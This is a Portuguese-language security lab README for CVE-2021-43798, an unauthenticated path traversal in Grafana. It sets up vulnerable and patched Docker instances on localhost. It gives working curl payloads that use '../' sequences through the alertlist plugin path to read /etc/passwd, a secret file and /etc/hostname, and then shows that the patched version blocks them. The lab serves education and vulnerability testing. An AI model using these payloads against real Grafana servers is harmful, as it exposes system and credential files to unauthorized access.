
CVE-2021-43798 Grafana Path Traversal Não Autenticado - Laboratório de Segurança | Shivam Gupta | 23104003
Apenas para uso educacional. Execute este laboratório somente em uma máquina local isolada. Nunca o exponha à internet.
| Campo | Detalhe |
|---|---|
| ID da CVE | CVE-2021-43798 |
| Produto | Grafana |
| Versões Afetadas | 8.0.0 – 8.3.0 |
| Versão Corrigida | 8.3.1+ |
| Severidade | Alta |
| Pontuação CVSS v3.1 | 7.5 |
| CWE | CWE-22 — Path Traversal |
| Autenticação Necessária | Nenhuma |
| Vetor de Ataque | Rede |
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta
docker compose up -d
Verifique:
curl http://127.0.0.1:3000/api/health
# Esperado: "version": "8.3.0"
Abra http://127.0.0.1:3000 — login: admin / admin
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"
Esperado: conteúdo do arquivo retornado com HTTP 200 — nenhuma autenticação necessária.
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health
Se o hostname for retornado → VULNERÁVEL. Versão 8.0.0–8.3.0 → VULNERÁVEL.
Inicie a instância corrigida (Grafana 8.3.1):
docker compose -f docker-compose.patched.yml up -d
Verifique se o exploit está bloqueado:
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Esperado: {"message": "Plugin file not found"}
docker compose down
docker compose -f docker-compose.patched.yml down